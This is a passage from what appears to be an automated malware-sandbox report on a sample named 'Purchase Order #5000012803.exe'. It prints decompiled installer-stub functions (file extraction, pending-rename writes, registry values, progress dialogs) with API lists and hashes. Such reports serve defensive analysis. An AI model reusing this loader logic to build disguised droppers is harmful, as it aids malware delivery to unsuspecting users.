                      • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                      • DeleteObject.GDI32(?), ref: 00401165
                      • EndPaint.USER32(?,?), ref: 0040116E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                      • String ID: F
                      • API String ID: 941294808-1304234792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E004057D3() {
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t15;
                      				long _t16;
                      				int _t20;
                      				void* _t28;
                      				long _t29;
                      				intOrPtr* _t37;
                      				int _t43;
                      				void* _t44;
                      				long _t47;
                      				CHAR* _t49;
                      				void* _t51;
                      				void* _t53;
                      				intOrPtr* _t54;
                      				void* _t55;
                      				void* _t56;
                      
                      				_t15 = E00405DA3(1);
                      				_t49 =  *(_t55 + 0x18);
                      				if(_t15 != 0) {
                      					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                      					if(_t20 != 0) {
                      						L16:
                      						 *0x423f30 =  *0x423f30 + 1;
                      						return _t20;
                      					}
                      				}
                      				 *0x422628 = 0x4c554e;
                      				if(_t49 == 0) {
                      					L5:
                      					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                      					if(_t16 != 0 && _t16 <= 0x400) {
                      						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                      						_t56 = _t55 + 0x10;
                      						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
                      						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                      						_t53 = _t20;
                      						 *(_t56 + 0x14) = _t53;
                      						if(_t53 == 0xffffffff) {
                      							goto L16;
                      						}
                      						_t47 = GetFileSize(_t53, 0);
                      						_t7 = _t43 + 0xa; // 0xa
                      						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                      						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                      							L15:
                      							_t20 = CloseHandle(_t53);
                      							goto L16;
                      						} else {
                      							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                      								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                      								if(_t28 == 0) {
                      									L13:
                      									_t29 = _t47;
                      									L14:
                      									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                      									SetFilePointer(_t53, 0, 0, 0);
                      									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                      									GlobalFree(_t51);
                      									goto L15;
                      								}
                      								_t37 = _t28 + 1;
                      								_t44 = _t51 + _t47;
                      								_t54 = _t37;
                      								if(_t37 >= _t44) {
                      									L21:
                      									_t53 =  *(_t56 + 0x14);
                      									_t29 = _t37 - _t51;
                      									goto L14;
                      								} else {
                      									goto L20;
                      								}
                      								do {
                      									L20:
                      									 *((char*)(_t43 + _t54)) =  *_t54;
                      									_t54 = _t54 + 1;
                      								} while (_t54 < _t44);
                      								goto L21;
                      							}
                      							E00405A85(_t51 + _t47, "[Rename]\r\n");
                      							_t47 = _t47 + 0xa;
                      							goto L13;
                      						}
                      					}
                      				} else {
                      					CloseHandle(E0040575C(_t49, 0, 1));
                      					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                      					if(_t16 != 0 && _t16 <= 0x400) {
                      						goto L5;
                      					}
                      				}
                      				return _t16;
                      			}

                      APIs
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                      • GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
                      • GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
                      • wsprintfA.USER32 ref: 00405864
                      • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                      • GlobalFree.KERNEL32 ref: 00405923
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                        • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                        • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                      • String ID: %s=%s$(&B$[Rename]
                      • API String ID: 3772915668-1834469719
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405CE3(CHAR* _a4) {
                      				char _t5;
                      				char _t7;
                      				char* _t15;
                      				char* _t16;
                      				CHAR* _t17;
                      
                      				_t17 = _a4;
                      				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                      					_t17 =  &(_t17[4]);
                      				}
                      				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                      					_t17 =  &(_t17[2]);
                      				}
                      				_t5 =  *_t17;
                      				_t15 = _t17;
                      				_t16 = _t17;
                      				if(_t5 != 0) {
                      					do {
                      						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                      							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                      							_t16 = CharNextA(_t16);
                      						}
                      						_t17 = CharNextA(_t17);
                      						_t5 =  *_t17;
                      					} while (_t5 != 0);
                      				}
                      				 *_t16 =  *_t16 & 0x00000000;
                      				while(1) {
                      					_t16 = CharPrevA(_t15, _t16);
                      					_t7 =  *_t16;
                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                      						break;
                      					}
                      					 *_t16 =  *_t16 & 0x00000000;
                      					if(_t15 < _t16) {
                      						continue;
                      					}
                      					break;
                      				}
                      				return _t7;
                      			}

                      APIs
                      • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                      • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                      • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                      • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Char$Next$Prev
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 589700163-1709115841
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                      				struct tagLOGBRUSH _v16;
                      				long _t35;
                      				long _t37;
                      				void* _t40;
                      				long* _t49;
                      
                      				if(_a4 + 0xfffffecd > 5) {
                      					L15:
                      					return 0;
                      				}
                      				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                      				if(_t49 == 0) {
                      					goto L15;
                      				}
                      				_t35 =  *_t49;
                      				if((_t49[5] & 0x00000002) != 0) {
                      					_t35 = GetSysColor(_t35);
                      				}
                      				if((_t49[5] & 0x00000001) != 0) {
                      					SetTextColor(_a8, _t35);
                      				}
                      				SetBkMode(_a8, _t49[4]);
                      				_t37 = _t49[1];
                      				_v16.lbColor = _t37;
                      				if((_t49[5] & 0x00000008) != 0) {
                      					_t37 = GetSysColor(_t37);
                      					_v16.lbColor = _t37;
                      				}
                      				if((_t49[5] & 0x00000004) != 0) {
                      					SetBkColor(_a8, _t37);
                      				}
                      				if((_t49[5] & 0x00000010) != 0) {
                      					_v16.lbStyle = _t49[2];
                      					_t40 = _t49[3];
                      					if(_t40 != 0) {
                      						DeleteObject(_t40);
                      					}
                      					_t49[3] = CreateBrushIndirect( &_v16);
                      				}
                      				return _t49[3];
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                      • String ID:
                      • API String ID: 2320649405-0
                      • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                      • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                      • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                      • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E0040266E(struct _OVERLAPPED* __ebx) {
                      				void* _t27;
                      				long _t32;
                      				struct _OVERLAPPED* _t47;
                      				void* _t51;
                      				void* _t53;
                      				void* _t56;
                      				void* _t57;
                      				void* _t58;
                      
                      				_t47 = __ebx;
                      				 *(_t58 - 8) = 0xfffffd66;
                      				_t52 = E004029E8(0xfffffff0);
                      				 *(_t58 - 0x44) = _t24;
                      				if(E004055E5(_t52) == 0) {
                      					E004029E8(0xffffffed);
                      				}
                      				E0040573D(_t52);
                      				_t27 = E0040575C(_t52, 0x40000000, 2);
                      				 *(_t58 + 8) = _t27;
                      				if(_t27 != 0xffffffff) {
                      					_t32 =  *0x423eb4;
                      					 *(_t58 - 0x2c) = _t32;
                      					_t51 = GlobalAlloc(0x40, _t32);
                      					if(_t51 != _t47) {
                      						E004031DA(_t47);
                      						E004031A8(_t51,  *(_t58 - 0x2c));
                      						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                      						 *(_t58 - 0x30) = _t56;
                      						if(_t56 != _t47) {
                      							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                      							while( *_t56 != _t47) {
                      								_t49 =  *_t56;
                      								_t57 = _t56 + 8;
                      								 *(_t58 - 0x38) =  *_t56;
                      								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                      								_t56 = _t57 +  *(_t58 - 0x38);
                      							}
                      							GlobalFree( *(_t58 - 0x30));
                      						}
                      						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                      						GlobalFree(_t51);
                      						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                      					}
                      					CloseHandle( *(_t58 + 8));
                      				}
                      				_t53 = 0xfffffff3;
                      				if( *(_t58 - 8) < _t47) {
                      					_t53 = 0xffffffef;
                      					DeleteFileA( *(_t58 - 0x44));
                      					 *((intOrPtr*)(_t58 - 4)) = 1;
                      				}
                      				_push(_t53);
                      				E00401423();
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                      				return 0;
                      			}












                      APIs
                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                      • GlobalFree.KERNEL32 ref: 00402717
                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                      • GlobalFree.KERNEL32 ref: 00402730
                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                      • String ID:
                      • API String ID: 3294113728-0
                      • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                      • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                      • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                      • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00404E23(CHAR* _a4, CHAR* _a8) {
                      				struct HWND__* _v8;
                      				signed int _v12;
                      				CHAR* _v32;
                      				long _v44;
                      				int _v48;
                      				void* _v52;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				CHAR* _t26;
                      				signed int _t27;
                      				CHAR* _t28;
                      				long _t29;
                      				signed int _t39;
                      
                      				_t26 =  *0x423684;
                      				_v8 = _t26;
                      				if(_t26 != 0) {
                      					_t27 =  *0x423f54;
                      					_v12 = _t27;
                      					_t39 = _t27 & 0x00000001;
                      					if(_t39 == 0) {
                      						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                      					}
                      					_t26 = lstrlenA(0x41fc70);
                      					_a4 = _t26;
                      					if(_a8 == 0) {
                      						L6:
                      						if((_v12 & 0x00000004) == 0) {
                      							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                      						}
                      						if((_v12 & 0x00000002) == 0) {
                      							_v32 = 0x41fc70;
                      							_v52 = 1;
                      							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                      							_v44 = 0;
                      							_v48 = _t29 - _t39;
                      							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                      							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                      						}
                      						if(_t39 != 0) {
                      							_t28 = _a4;
                      							 *((char*)(_t28 + 0x41fc70)) = 0;
                      							return _t28;
                      						}
                      					} else {
                      						_t26 =  &(_a4[lstrlenA(_a8)]);
                      						if(_t26 < 0x800) {
                      							_t26 = lstrcatA(0x41fc70, _a8);
                      							goto L6;
                      						}
                      					}
                      				}
                      				return _t26;
                      			}


















                      APIs
                      • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • SendMessageA.USER32 ref: 00404EB7
                      • SendMessageA.USER32 ref: 00404ED1
                      • SendMessageA.USER32 ref: 00404EDF
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                      • String ID:
                      • API String ID: 2531174081-0
                      • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                      • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                      • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                      • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                      				long _v8;
                      				signed char _v12;
                      				unsigned int _v16;
                      				void* _v20;
                      				intOrPtr _v24;
                      				long _v56;
                      				void* _v60;
                      				long _t15;
                      				unsigned int _t19;
                      				signed int _t25;
                      				struct HWND__* _t28;
                      
                      				_t28 = _a4;
                      				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                      				if(_a8 == 0) {
                      					L4:
                      					_v56 = _t15;
                      					_v60 = 4;
                      					SendMessageA(_t28, 0x110c, 0,  &_v60);
                      					return _v24;
                      				}
                      				_t19 = GetMessagePos();
                      				_v16 = _t19 >> 0x10;
                      				_v20 = _t19;
                      				ScreenToClient(_t28,  &_v20);
                      				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                      				if((_v12 & 0x00000066) != 0) {
                      					_t15 = _v8;
                      					goto L4;
                      				}
                      				return _t25 | 0xffffffff;
                      			}















                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Message$Send$ClientScreen
                      • String ID: f
                      • API String ID: 41195575-1993550816
                      • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                      • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                      • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                      • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                      				char _v68;
                      				void* _t11;
                      				CHAR* _t19;
                      
                      				if(_a8 == 0x110) {
                      					SetTimer(_a4, 1, 0xfa, 0);
                      					_a8 = 0x113;
                      				}
                      				if(_a8 == 0x113) {
                      					_t11 = E00402BA9();
                      					_t19 = "unpacking data: %d%%";
                      					if( *0x423eb0 == 0) {
                      						_t19 = "verifying installer: %d%%";
                      					}
                      					wsprintfA( &_v68, _t19, _t11);
                      					SetWindowTextA(_a4,  &_v68);
                      					SetDlgItemTextA(_a4, 0x406,  &_v68);
                      				}
                      				return 0;
                      			}







                      APIs
                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                      • wsprintfA.USER32 ref: 00402B7C
                      • SetWindowTextA.USER32(?,?), ref: 00402B8C
                      • SetDlgItemTextA.USER32 ref: 00402B9E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Text$ItemTimerWindowwsprintf
                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                      • API String ID: 1451636040-1158693248
                      • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                      • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                      • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                      • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E004022F5(void* __eax) {
                      				void* _t15;
                      				char* _t18;
                      				int _t19;
                      				char _t24;
                      				int _t27;
                      				intOrPtr _t35;
                      				void* _t37;
                      
                      				_t15 = E00402ADD(__eax);
                      				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                      				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                      				 *(_t37 - 0x44) = E004029E8(2);
                      				_t18 = E004029E8(0x11);
                      				_t31 =  *0x423f50 | 0x00000002;
                      				 *(_t37 - 4) = 1;
                      				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
                      				if(_t19 == 0) {
                      					if(_t35 == 1) {
                      						E004029E8(0x23);
                      						_t19 = lstrlenA(0x40a368) + 1;
                      					}
                      					if(_t35 == 4) {
                      						_t24 = E004029CB(3);
                      						 *0x40a368 = _t24;
                      						_t19 = _t35;
                      					}
                      					if(_t35 == 3) {
                      						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                      					}
                      					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                      						 *(_t37 - 4) = _t27;
                      					}
                      					_push( *(_t37 + 8));
                      					RegCloseKey();
                      				}
                      				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                      				return 0;
                      			}











                      APIs
                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsgB0E.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsgB0E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsgB0E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CloseCreateValuelstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\nsgB0E.tmp
                      • API String ID: 1356686001-1971467431
                      • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                      • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                      • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                      • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402BC5(intOrPtr _a4) {
                      				char _v68;
                      				long _t6;
                      				struct HWND__* _t7;
                      				struct HWND__* _t14;
                      
                      				if(_a4 != 0) {
                      					_t14 =  *0x417044; // 0x0
                      					if(_t14 != 0) {
                      						_t14 = DestroyWindow(_t14);
                      					}
                      					 *0x417044 = 0;
                      					return _t14;
                      				}
                      				__eflags =  *0x417044; // 0x0
                      				if(__eflags != 0) {
                      					return E00405DDC(0);
                      				}
                      				_t6 = GetTickCount();
                      				__eflags = _t6 -  *0x423eac;
